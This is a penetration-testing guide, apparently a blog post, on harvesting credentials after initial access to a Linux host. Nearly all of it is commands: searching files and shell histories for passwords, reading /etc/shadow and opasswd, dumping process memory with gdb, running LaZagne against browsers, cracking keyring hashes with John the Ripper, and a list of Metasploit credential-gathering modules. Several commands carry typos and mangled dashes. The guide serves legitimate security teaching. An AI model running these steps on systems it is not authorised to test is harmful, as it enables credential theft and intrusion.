Guides, Linux, Privilege Escalation

Linux Privilege Escalation – Credentials Harvesting

Introduction

Linux-based operating systems and applications often store clear text, encoded or hashed credentials in files or in memory.

When gaining initial access to a Linux machine and performing privilege escalation enumeration steps, often passwords can be found through these means and they can be used to further escalate privileges.

There are various methods to harvest credentials in a Linux system in order to escalate privileges, the following ones are the most common and they are always worth a try.

Finding passwords in files

One of the first things to do is to search for files containing the “password” or “passwd” string, or configuration files containing authentication information, as this could help in identifying hidden credentials:

  • grep –color=auto -rnw ‘/’ -ie “PASSWORD\|PASSWD” –color=always 2> /dev/null
  • find . -type f -exec grep -i -I “PASSWORD\|PASSWD” {} /dev/null \;
  • locate config.php
  • locate password; locate passwd
  • cat /var/mail/*; cat var/spol/mail
  • locate config.
  • crontab -l; ls -alh /var/spool/cron; ls -al /etc/ | grep cron; ls -al /etc/cron; cat /etc/cron; cat /etc/at.allow; cat /etc/at.deny; cat /etc/cron.allow; cat /etc/cron.deny; cat /etc/crontab; cat /etc/anacrontab; cat /var/spool/cron/crontabs/root

Bash History

Bash and other scripting languages, along with various services often store previous commands run in the system, which could contain clear-text or encoded passwords if they are hard-coded in the command itself:

  • find / -name *_history -xdev 2> /dev/null

Check for Hashes Stored in Passwd/Shadow

The /etc/passwd file used to store user hashes although it no longer does, as these are now stored in the /etc/shadow file. The reason why this was changed is that some of the information stored in the /etc/passwd file has to be world-readable for the operating system to operate correctly, so hashes were moved to the shadow file which is normally only accessible by root. Hashes may still be stored in /etc/passwd as it is backward compatible.

  • find / -name passwd -xdev 2>/dev/null; find / -name shadow -xdev 2>/dev/null
  • cat /etc/passwd; cat /etc/shadow

Old passwords in /etc/security/opasswd

The /etc/security/opasswd file is used by pam_cracklib (a module used in Linux to ensure a good password policy is in place) to store the hashed version of old passwords used on the system to prevent users from reusing the same ones over and over again.

  • cat /etc/security/opasswd
  • find / -name opasswd -xdev 2>/dev/null

Recently Modified Files

It can be useful to check files that were modified recently, as they may be containing useful information and/or credentials. The following command will find standard files modified in the last 30 minutes:

  • find / -mmin -30 -xdev 2>/dev/null

Credentials Stored in Memory

Services will sometimes store the credentials entered by the end user in clear text in memory. The commands below can help find credentials stored in processes:

  • strings /dev/mem -n10 | grep -ie “PASSWORD|PASSWD” –color=always

or with GDB:

  • ps -ef | grep [service name] (find process id)
  • gdb -p [process id)
  • info proc mappings
  • q
  • dump memory /tmp/process<START_HEAD> <END_HEAD>
  • q
  • strings /tmp/process

You can also use the following tools to dump the system memory and find clear-text credentials stored within it:

Credentials Stored in Browsers

Browsers such as Google Chrome, Firefox, Microsoft Edge etc. can often store passwords when authentication to a website is performed. Lazagne is an open source application used toretrieve passwords stored on a local computer, and one of its many functions is to retrieve passwords stored in internet browsers.

CommandDescription
laZagne.py allLaunch all modules
laZagne.py browsersLaunch only a specific module
laZagne.py browsers -firefoxLaunch a specific software script
laZagne.py -h
laZagne.py browsers -h
Get help
laZagne.py all -vvChange verbosity mode (2 different levels)

GNOME Keyring

GNOME Keyring is a software application designed to store security credentials such as usernames, passwords, and keys. The sensitive data is encrypted and stored in a keyring file in the user’s home directory. It can be found through the following command:

  • locate login.keyring; locate user.keystore

John the Ripper can then be used to extract and crack the hashes and reveal the actual password:

  • /usr/share/john/keyring2john.py login.keyring > hashes.txt
  • /usr/share/john/keystore2john.py user.keystore
  • john –wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

MimiPenguin and the post/linux/gather/gnome_keyring_dump Metasploit module can also be used to perform this task.

Additional Metasploit Modules

There are certain Metasploit modules that aim at to find clear-text or encoded credentials in a target system:

  • use post/linux/gather/enum_system
  • use post/linux/gather/enum_users_history
  • use post/linux/gather/gnome_commander_creds
  • use post/linux/gather/hashdump
  • use post/linux/gather/gnome_keyring_dump
  • use post/linux/gather/enum_psk
  • use post/linux/gather/enum_configs
  • use post/linux/gather/ecryptfs_creds
  • use post/linux/gather/mount_cifs_creds
  • use post/linux/gather/openvpn_credentials
  • use post/linux/gather/phpmyadmin_credsteal
  • use post/linux/gather/pptpd_chap_secrets
  • use post/linux/gather/tor_hiddenservices
  • use post/multi/gather/filezilla_client_cred
  • use post/multi/gather/firefox_creds
  • use post/multi/gather/gpg_creds
  • use post/multi/gather/grub_creds
  • use post/multi/gather/irssi_creds
  • use post/multi/gather/lastpass_creds
  • use post/multi/gather/maven_creds
  • use post/multi/gather/netrc_creds
  • use post/multi/gather/pgpass_creds
  • use post/multi/gather/pidgin_cred
  • use post/multi/gather/remmina_creds
  • use post/multi/gather/rsyncd_creds
  • use post/multi/gather/ssh_creds
  • use post/multi/gather/thunderbird_creds

Conclusion

Exposed passwords are a very common method of intrusion and privilege escalation, and although it’s not as common nowadays since most applications use encryption, it’s something that should not be overlooked.

Automated enumeration scripts will also perform credential harvesting although it’s always best to do this manually.